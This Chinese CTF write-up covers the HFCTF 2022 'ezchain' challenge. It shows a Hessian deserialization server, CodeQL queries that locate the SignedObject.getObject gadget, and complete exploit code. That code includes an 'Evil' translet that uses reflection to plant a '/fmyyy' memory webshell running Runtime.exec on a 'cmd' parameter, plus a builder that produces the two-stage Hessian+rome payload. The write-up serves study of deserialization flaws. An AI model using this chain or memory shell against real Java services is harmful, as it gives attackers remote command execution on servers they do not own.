2022HFCTF-ezchain

  1. 1. 前言
  2. 2. 分析
  3. 3. codeql寻找
    1. 3.1. jdk建库
    2. 3.2. 编写
      1. 3.2.1. 第一版
      2. 3.2.2. 第二版
  4. 4. 回显问题

前言

比赛的时候没做出来,赛后复现了,隔了这么久想写一篇笔记顺便练习一下codeql

分析

public class Index {
    /**
     * Entry point of the challenge service: binds a com.sun.net.httpserver HttpServer on
     * port 8090, routes every path to {@link MyHandler} and serves on a cached thread pool.
     */
    public static void main(String[] args) throws Exception {
        System.out.println("server start");
        HttpServer server = HttpServer.create(new InetSocketAddress(8090), 0);
        server.createContext("/", new MyHandler());
        server.setExecutor(Executors.newCachedThreadPool());
        server.start();
    }

    static class MyHandler implements HttpHandler {
        /**
         * Handles one request: parses the query string, and when a {@code token} parameter
         * is present whose hashCode collides with the secret's without being equal to it,
         * deserializes the raw request body with Hessian2Input.
         *
         * @param t the exchange; its body is only read on the token-accepted branch
         * @throws IOException from the response stream
         */
        public void handle(HttpExchange t) throws IOException {
            String query = t.getRequestURI().getQuery();
            Map<String, String> queryMap = queryToMap(query);
            String response = "Welcome to HFCTF 2022";
            if (queryMap != null) {
                String token = queryMap.get("token");
                String secret = "HFCTF2022";
                // Gate: token.hashCode() must equal secret.hashCode() while the strings differ.
                // String.hashCode() is a 32-bit non-cryptographic hash, so this is not an
                // authentication check: any colliding string passes. Objects.hashCode(null)
                // is 0, so a missing token passes only if the secret's hash happened to be 0.
                if (Objects.hashCode(token) == secret.hashCode() && !secret.equals(token)) {
                    InputStream is = t.getRequestBody();
                    try {
                        // Sink: the untrusted request body is deserialized by Hessian. No
                        // SerializerFactory allow/deny list is configured in this listing,
                        // so the stream effectively chooses which classes get instantiated
                        // and which of their setters/getters run (the rome chain built below).
                        Hessian2Input input = new Hessian2Input(is);
                        input.readObject();
                    } catch (Exception e) {
                        // The client only sees a generic message; whatever readObject()
                        // executed before the exception has already happened.
                        response = "oops! something is wrong";
                    }
                } else {
                    response = "your token is wrong";
                }
            }
            // Content length is the char count of response; correct here only because all
            // three possible responses are ASCII.
            t.sendResponseHeaders(200, response.length());
            OutputStream os = t.getResponseBody();
            os.write(response.getBytes());
            os.close();
        }

        /**
         * Splits a query string into a key/value map.
         *
         * Parameters are separated by '&' and each is split on '='; a parameter without '='
         * maps to "". Note that {@code split("=")} keeps only the second segment of
         * "a=b=c", and no percent-decoding is performed.
         *
         * @param query the raw query string, may be null
         * @return the parsed map, or null when {@code query} is null
         */
        public Map<String, String> queryToMap(String query) {
            if (query == null)
                return null;
            Map<String, String> result = new HashMap<>();
            for (String param : query.split("&")) {
                String[] entry = param.split("=");
                if (entry.length > 1) {
                    result.put(entry[0], entry[1]);
                } else {
                    result.put(entry[0], "");
                }
            }
            return result;
        }
    }
}

Hessian+rome的反序列化

网上公开的hessian+rome链最后是进行JNDI注入的,但题目设置了不出网,所以不能利用。

rome原本加载字节码的链子也不能用,因为相关字段的修饰符是transient,而Hessian反序列化并不会调用类的readObject方法对其恢复。

所以根据rome链终点的特性,找合适的setter或者getter方法。最后找到的是

java.security.SignedObject#getObject

1649578618039.png

里面有个原生的反序列化。

codeql寻找

想练习一下codeql,知道终点之后只要写对规则就行了

jdk建库

关于建库这个问题,实际上就是编译jdk的过程,只不过最后一步从编译jdk变成了建codeql库。所以按照网上对应系统编译jdk的流程来就行,到最后一步编译jdk时再用codeql建库。

编写

第一版

先来一个简单的版本,单纯从语法结构上来分析

前面说了终点是

java.security.SignedObject#getObject

rome终点的特点就是调用无参的setter、getter和is方法

所以要求

1.get或set或is开头,无参数

2.调用readObject

最终:

import java

/**
 * A candidate chain endpoint in the shape rome's bean helpers invoke: a public,
 * parameterless method from the analysed source whose name starts with get, set or is.
 */
class TargetMethod extends Method{
  TargetMethod(){
    this.fromSource() and
    this.hasNoParameters() and
    this.isPublic() and
    // Drops the bare names "get"/"set"; as a side effect it also drops 3-char names like "isX".
    this .getName().length() > 3 and
    (
      // indexOf(...) = 0 holds when an occurrence sits at position 0, i.e. "starts with".
      this.getName().indexOf("get") = 0 or
      this.getName().indexOf("set") = 0 or
      this.getName().indexOf("is") = 0
    )
  }
}

// Report every (target method, readObject) pair where a call to a method named
// readObject sits somewhere inside the target's body.
from MethodAccess ma, Method me, TargetMethod tm

where
  me = ma.getMethod() and
  // getAChild*() is the reflexive-transitive child relation, so calls nested in
  // try/if/loop statements inside the body are covered too.
  ma.getEnclosingStmt() = tm.getBody().getAChild*() and
  // Name-only match: the declaring type of readObject is not constrained, which is
  // where most of the noise comes from.
  me.hasName("readObject")
select tm,me

1649684667181.png

第二版

想试着用污点追踪找找看,准备简单定义一下,sink就是readObject

先写一下sink吧

readObject一般都是 a.readObject()的形式调用

所以sink这么写

/**
 * Sink: the qualifier expression `a` of any call `a.readObject()`. The callee is matched
 * by name only, so its declaring type is not constrained.
 */
override predicate isSink(DataFlow::Node sink) {
  exists(Call call ,Callable parseExpression|
    sink.asExpr() = call.getQualifier() and
    call.getCallee()=parseExpression and
    parseExpression.hasName("readObject")
  )
}

接着是source,不知道怎么很好地去定义,暂时定义为ByteArrayInputStream的构造调用,并且参数为成员变量,这里偷懒就只找以this开头的

刚接触codeql不久,写得挺烂的,有些误报但还是能找到,就当练一下手吧。

/**
* @kind path-problem
*/
import java
import semmle.code.java.frameworks.spring.SpringController
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PathGraph
import semmle.code.java.dataflow.FlowSources

/** A `new ByteArrayInputStream(...)` expression (class name keeps the original spelling). */
class ByteArrayInputStreamContruct extends ClassInstanceExpr{
  ByteArrayInputStreamContruct(){
    // getDeclaringType*() is the reflexive-transitive closure; for a top-level java.io
    // class it is the constructor's own declaring type that matches.
    this.getConstructor().getDeclaringType*().hasQualifiedName("java.io", "ByteArrayInputStream")
  }
}

/**
 * Taint configuration "Configer": source = an argument of a ByteArrayInputStream
 * construction whose printed form starts with "this" (a stand-in for "a field of this
 * object", i.e. data the deserialized instance controls); sink = the qualifier of a
 * readObject() call.
 */
class Configuration extends TaintTracking::Configuration {
  Configuration() {
    this = "Configer"
  }

  override predicate isSource(DataFlow::Node source) {
    exists(
      ByteArrayInputStreamContruct bc |
      source.asExpr() = bc.getAnArgument() and
      // Textual heuristic on toString(). The two getAnArgument() calls are independent:
      // for the (byte[], int, int) constructor the "this" test can be satisfied by one
      // argument while source binds to another, which adds false positives.
      bc.getAnArgument().toString().indexOf("this") = 0
    )
  }

  override predicate isSink(DataFlow::Node sink) {
    // Qualifier `a` of a call `a.readObject()`, matched by callee name only.
    exists(Call call ,Callable parseExpression|
      sink.asExpr() = call.getQualifier() and
      call.getCallee()=parseExpression and
      parseExpression.hasName("readObject")
    )
  }

}

// Path query: every taint path from such a source to a readObject() qualifier.
from DataFlow::PathNode src, DataFlow::PathNode sink, Configuration config
where config.hasFlowPath(src, sink)
select sink.getNode(), src, sink, "source are"

1649748462756.png

这里想减少误报就定义一下isAdditionalTaintStep吧。

回显问题

现在能做到任意原生反序列化了,但因为不出网,最后还得解决回显问题。这里借鉴feng师傅的思路:

1649748988560.png

所以恶意类

package HFCTF;

import com.sun.net.httpserver.HttpContext;
import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;
import com.sun.net.httpserver.HttpServer;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;


public class Evil extends AbstractTranslet implements HttpHandler{
    /**
     * Constructor, i.e. the code that runs when this translet class is instantiated
     * (presumably by TemplatesImpl once the inner chain loads the bytecode — see exp).
     *
     * It reaches the running server purely through reflection on the thread tree:
     * current thread -> its ThreadGroup -> the group's threads -> the thread whose name
     * contains "Thread-2" -> its Runnable target -> that target's enclosing instance
     * (synthetic field this$0), on which createContext(String, HttpHandler) is invoked to
     * register this object under "/fmyyy". That is the "回显" mechanism: a handler added to
     * the live server at runtime. Every failure is printed and otherwise swallowed.
     *
     * Defender notes: this only works because the Hessian sink let the chain execute; once
     * installed, the extra context is a path that exists in no deployed source, and
     * reflective reads of Thread.group / ThreadGroup.threads / this$0 are a recognisable
     * fingerprint for detection.
     */
    public Evil() throws Exception{
        super();
        try {
            Object obj = Thread.currentThread();
            Field field = obj.getClass().getDeclaredField("group");
            field.setAccessible(true);
            obj = field.get(obj);

            field = obj.getClass().getDeclaredField("threads");
            field.setAccessible(true);
            obj = field.get(obj);
            Thread[] threads = (Thread[]) obj;
            for (Thread thread : threads) {
                // Thread-name heuristic: the thread holding the server object is assumed
                // to be named "Thread-2", which depends on thread creation order.
                if (thread.getName().contains("Thread-2")) {
                    try {
                        field = thread.getClass().getDeclaredField("target");
                        field.setAccessible(true);
                        obj = field.get(thread);

                        // this$0 is the synthetic outer-instance field of an inner class;
                        // the code expects it to be an object exposing createContext.
                        field = obj.getClass().getDeclaredField("this$0");
                        field.setAccessible(true);
                        obj = field.get(obj);

                        Method createContext = obj.getClass().getMethod("createContext",String.class,HttpHandler.class);
                        createContext.setAccessible(true);
                        // Progress markers; they only reach the server's stdout.
                        System.out.println(123);

                        createContext.invoke(obj,"/fmyyy",this);
                        System.out.println(456);

                    }catch (Exception e){
                        System.out.println(e.toString());
                        e.printStackTrace();
                    }
                }

            }

        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    // No-op translet methods; present only so the class is a concrete AbstractTranslet.
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    /**
     * The registered handler: splits the query on '=', and when the key is "cmd" runs the
     * value with Runtime.exec and returns the process's stdout as the response body. This
     * is the command-execution endpoint the constructor installs; only stdout is read,
     * and a request of any other shape fails in this method rather than being answered.
     *
     * @param t the exchange for the request to "/fmyyy"
     * @throws IOException from the process or response streams
     */
    @Override
    public void handle(HttpExchange t) throws IOException {
        String response = "";
        String query = t.getRequestURI().getQuery();
        String[] var3 = query.split("=");
        System.out.println(var3[0]+var3[1]);
        ByteArrayOutputStream output = null;
        if (var3[0].equals("cmd")){
            InputStream inputStream = Runtime.getRuntime().exec(var3[1]).getInputStream();
            output = new ByteArrayOutputStream();
            byte[] buffer = new byte[4096];
            int n = 0;
            while (-1 != (n = inputStream.read(buffer))) {
                output.write(buffer, 0, n);
            }
        }
        // output is still null if the key was not "cmd", so toByteArray() throws here.
        response+=("\n"+new String(output.toByteArray()));
        t.sendResponseHeaders(200, (long)response.length());
        OutputStream os = t.getResponseBody();
        os.write(response.getBytes());
        os.close();
    }



}

所以最后

package HFCTF;

import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;
import java.lang.reflect.Field;
import java.security.*;
import java.util.Base64;
import java.util.HashMap;

import com.caucho.hessian.io.Hessian2Output;
import com.caucho.hessian.io.HessianOutput;
import com.rometools.rome.feed.impl.EqualsBean;
import com.rometools.rome.feed.impl.ObjectBean;
import com.rometools.rome.feed.impl.ToStringBean;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;


public class exp {

    /**
     * Serializes {@code javaBean} with Hessian 2 and returns the bytes.
     *
     * @param javaBean the object graph to write
     * @param <T> any type Hessian can encode
     * @return the Hessian 2 encoding of {@code javaBean}
     * @throws Exception wrapping any serialization failure (the original is kept as cause)
     */
    public static <T> byte[] He2serialize(T javaBean) throws Exception {
        Hessian2Output ho = null;
        ByteArrayOutputStream baos = null;

        try {
            baos = new ByteArrayOutputStream();
            ho = new Hessian2Output(baos);
            ho.writeObject(javaBean);
            ho.flush();
            return baos.toByteArray();
        } catch (Exception ex) {
            System.out.println("[模拟日志记录]HessianUtils.serialize.异常." + ex.getMessage());
            throw new Exception("HessianUtils.serialize.异常.", ex);
        } finally {
            if (null != ho) {
                ho.close();
            }
        }
    }

    /**
     * Sets a (possibly private) declared field by reflection. Only fields declared
     * directly on {@code obj.getClass()} are found; inherited ones throw
     * NoSuchFieldException.
     *
     * @param obj       the instance to modify
     * @param fieldName the declared field's name
     * @param value     the new value
     * @throws Exception on a missing field or an access failure
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    /**
     * Builds the two-stage payload described in the write-up and prints it Base64-encoded.
     *
     * Inner stage (native Java serialization): a TemplatesImpl carrying the Evil bytecode,
     * wrapped rome-style as HashMap -> ObjectBean -> EqualsBean -> ToStringBean, then
     * sealed inside a SignedObject (whose constructor serializes its content with
     * ObjectOutputStream).
     * Outer stage (Hessian): the same rome wrapping around the SignedObject, so the getter
     * walk reaches SignedObject.getObject(), which deserializes the inner bytes natively —
     * the hop the CodeQL queries above were written to find. getObject() does not check
     * the signature (verify() is a separate call), so the DSA key pair merely has to exist;
     * it establishes no trust. The defensive takeaway is that a SignedObject is only as
     * trustworthy as the verification its reader actually performs, and that the Hessian
     * side needs class allow/deny-listing to stop rome beans from ever being materialised.
     */
    public static void main(String[] args) throws Exception {
        // Class file of Evil, Base64-encoded (the literal was removed from this page); it is
        // handed to TemplatesImpl via _bytecodes.
        byte[] payload = Base64.getDecoder().decode("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");
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates,"_bytecodes",new byte[][]{payload});
        // Presumably any non-null _name is needed for the usual TemplatesImpl chain to proceed.
        setFieldValue(templates,"_name","f");
        //SerializeUtil.setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
        ToStringBean toStringBean1 = new ToStringBean(Templates.class, templates);
        EqualsBean equalsBean1 = new EqualsBean(ToStringBean.class, toStringBean1);
        ObjectBean objectBean1 = new ObjectBean(String.class,"f");
        HashMap evilMap1 = new HashMap();
        evilMap1.put(objectBean1,1);
        evilMap1.put(objectBean1,1);
        // equalsBean is attached only after the puts, so the bean comparison presumably
        // fires when the map is rebuilt on the receiving side rather than here.
        setFieldValue(objectBean1,"equalsBean",equalsBean1);
        //byte[] bytes = SerializeUtil.serialize(evilMap1);
        Signature signature = Signature.getInstance("DSA");
        KeyPairGenerator kg = KeyPairGenerator.getInstance("DSA");
        kg.initialize(1024);
        KeyPair kp = kg.genKeyPair();
        // Inner stage sealed: SignedObject stores the native serialization of evilMap1.
        SignedObject signedObject = new SignedObject(evilMap1,kp.getPrivate(),signature);


        // Outer stage: same rome wrapping, now pointing at the SignedObject so that
        // the getter walk ends in SignedObject.getObject().
        ToStringBean toStringBean = new ToStringBean(SignedObject.class, signedObject);
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);



        ObjectBean objectBean = new ObjectBean(String.class,"f");
        HashMap evilMap = new HashMap();
        evilMap.put(objectBean,1);
        evilMap.put(objectBean,1);
        setFieldValue(objectBean,"equalsBean",equalsBean);
        byte[] serialize = He2serialize(evilMap);
        System.out.println(Base64.getEncoder().encodeToString(serialize));
    }
}